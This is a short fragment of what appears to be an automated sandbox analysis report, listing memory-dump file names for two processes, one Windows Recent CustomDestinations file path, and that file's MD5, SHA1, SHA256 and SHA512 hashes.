memory/3092-17-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-16-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-14-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-15-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-38-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-39-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-41-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-43-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-45-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-47-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-46-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp
memory/3092-48-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-52-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/856-53-0x00007FF69FFD0000-0x00007FF69FFD8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 33ed741e738ffd17972791590e87aa49 |
| SHA1 | e9b716cc084e27b359ecf84a8e747c1e6d2d99a6 |
| SHA256 | 6a4cc7e2807e9a9891c9bda562deef9f9cdca2b8a043c0b9307013e729601156 |
| SHA512 | 84c0e5fac4ab95a78aa2d929c6be519f8f683b64cd13920d59a31ffff09350f0fbf25cd54544e87bb112b503f3bc7222379ccd4748096eaf8fc8aa91df779126 |